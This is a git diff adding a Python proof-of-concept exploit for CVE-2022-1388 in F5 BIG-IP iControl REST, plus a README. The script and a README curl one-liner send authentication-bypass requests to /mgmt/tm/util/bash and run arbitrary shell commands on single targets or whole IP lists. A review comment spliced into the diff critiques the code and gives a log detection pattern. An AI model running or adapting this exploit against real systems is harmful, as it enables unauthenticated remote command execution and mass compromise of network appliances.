diff --git a/CVE-2022-1388.py b/CVE-2022-1388.py
new file mode 100644
index 0000000..f40c37d
--- /dev/null
+++ b/CVE-2022-1388.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python3
+import argparse, requests, urllib3
+from termcolor import colored
+import concurrent.futures
+urllib3.disable_warnings()
+
+
+def exploit(target, command):
+
+ try:
+
+ url = f'https://{target}/mgmt/tm/util/bash'
+ headers = {
+ 'Host': '127.0.0.1',
+ 'Authorization': 'Basic YWRtaW46',
+ 'X-F5-Auth-Token': '0',
+ 'Connection': 'X-F5-Auth-Token',
+ 'Content-Type': 'application/json'
+ }
+
+ j = {'command':'run','utilCmdArgs':'-c "{0}"'.format(command)}
+ r = requests.post(url, headers=headers, json=j, verify=False, timeout=5)
+
+ if ( r.status_code != 204 and r.headers['content-type'].strip().startswith('application/json')):
+ print(target + '\t> ' + r.json()['commandResult'].strip())
+
+ else:
+ print(colored('Target is not vulnerable', "yellow", attrs=['bold']))
+
+
+ except Exception as e:
+ print(colored(e, "yellow", attrs=['bold']))
+
+
+if __name__ == "__main__":
+
+
+ ## parse argument
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-t', '--target', help='The IP address of the target, eg: 127.0.0.1:80', default=False)
+ parser.add_argument("-l", "--list", action="store", help="Target urls saperated with new line", default=False)
+ parser.add_argument('-c', '--command', help='The command to execute, eg: id', default='id')
+ args = parser.parse_args()
+
+ if args.target is not False:
+
+ exploit(args.target, args.command)
+
+ elif args.list is not False:
+
+ with open(args.list) as targets:
+
+ for target in targets:
+ target = target.rstrip()
+ exploit(target, args.command)
+
+ else:
+
+ parser.print_help()
+ parser.exit()
diff --git a/README.MD b/README.MD
new file mode 100644
index 0000000..d686834
--- /dev/null
+++ b/README.MD
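Review bot: The verdict branch in `exploit()` misreports what the target returned: a JSON response without a `commandResult` key (an authentication-error body, for instance) raises `KeyError` inside the `if`, which the broad `except Exception` prints as a bare key name, and any non-JSON reply such as a proxy error page is printed as "Target is not vulnerable". Someone using the script to confirm remediation should therefore treat that message as inconclusive and check the installed version against the F5 advisory K23605346 linked in the README. I would gate on `r.status_code == 200` and read `r.json().get('commandResult')`, printing "inconclusive" for everything else. `import concurrent.futures` is unused, and `default=False` tested with `is not False` reads better as a required `add_mutually_exclusive_group()`. On the detection side, the request built here (a POST to `/mgmt/tm/util/bash` carrying `Connection: X-F5-Auth-Token` and a Basic `Authorization` value with an empty password) is the pattern to alert on in management-interface logs.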
@@ -0,0 +1,17 @@
+# BIG-IP iControl REST vulnerability CVE-2022-1388 PoC
+
+This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services
+
+## PoC
+
+You can use the following curl one liner to check for the F5 BigIP vulnerability or use the provided python script.
+
+```
+cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
+```
+
+
+## References
+
+https://support.f5.com/csp/article/K23605346
+https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit